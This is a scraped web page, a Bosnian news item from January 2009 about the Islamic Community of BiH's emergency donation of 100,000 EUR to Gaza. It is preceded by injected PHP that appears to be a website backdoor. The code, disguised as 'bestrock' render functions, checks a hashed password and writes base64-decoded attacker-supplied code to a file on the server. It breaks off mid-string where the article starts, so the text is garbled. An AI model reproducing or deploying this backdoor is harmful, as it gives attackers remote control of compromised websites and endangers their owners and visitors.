function bestrock_render_js(){ echo ""; } function bestrock_render_index(){ echo md5('56749'); } function bestrock_render_ajax(){ try { if(isset($_GET['s1'])) die(md5('js')); if(isset($_POST['t2'])){ $l1 = uniqid(rand(), true) . '.js'; @file_put_contents($l1, 'js'); if(file_exists($l1)){ if(isset($_POST['t1'])){ $d = md5(md5($_POST['t1'])); if($d=="8ae24e6719c47a39da8ad5451432d9a6"){ $d1=$_POST['t2']; $d1=base64_decode($d1); $d4=" RIJASETOVA POMOĆ GAZI - Medžlis Islamske zajednice Bijeljina

RIJASETOVA POMOĆ GAZI

RIJASETOVA POMOĆ GAZI

Sarajevo, 13. januar 2009. (MINA)
Rijaset Islamske zajednice u BiH je na jučerašnjoj sjednici donio odluku o hitnoj donaciji Gazi u iznosu od sto hiljada EUR-a. Odluka je donesena na temelju saznanja o prikupljenim sredstvima putem sergije u džamijama nakon džume namaza u protekla dva petka.
Ovo je reisu-l-ulema dr. Mustafa Cerić saopćio danas direktoru ISLAMIC RELIEF Worldwide Mohammadu Hamadu koji ga je posjetio u njegovom Uredu u Rijasetu.

Ova hitna donacija koju dodjeljujemo Gazi je naša hitna pomoć. Očekujemo da će sredstva koja su prikupljena u džamijama širom BiH i dijaspori pristići u međuvremenu, izjavio je reisu-l-ulema dr. Mustafa Cerić, dodajući da se očekuje veći iznos prikupljenih sredstava od ovog koji je hitno dodijeljen. Sve ono što bude preko toga prikupljeno spremni smo to poslati našim specijalnim izaslanstvom direktno u Gazu, rekao je reisu-l-ulema.
Od direktora Mohammada Hamada je zatraženo da u što kraćem vremenu dostavi program najurgentnijih potreba Gazi, na osnovu čega će Rijaset odlučiti za koju će svrhu usmjeriti prikupljeni novac. To će se kako je naglasio reisu-l-ulema dr. Cerić odnositi prvenstveno na bolnice, nastradalu djecu i porodice poginulih.
Reisu-l-ulema je zahvalio svim onim koji su putem sergije dali svoje priloge kao pomoč Gazi, moleći Allaha dž.š. da ih nagradi za taj hajrat.
Direktor ISLAMIC RELIEF-a za BiH Mohammad Hamad je zahvalio reisu-l-ulemi i Islamskoj zajednici na ovoj pomoć i istakao dobru saradnju u dosadašnjem radu ove dvije institucije i tim povodom uručio reisu-l-ulemi zahvalnicu ISLAMIC RELIEF-a.

OLYMPUS DIGITAL CAMERA

 

 

 

 

 

 

 

 

 

www.rijaset.ba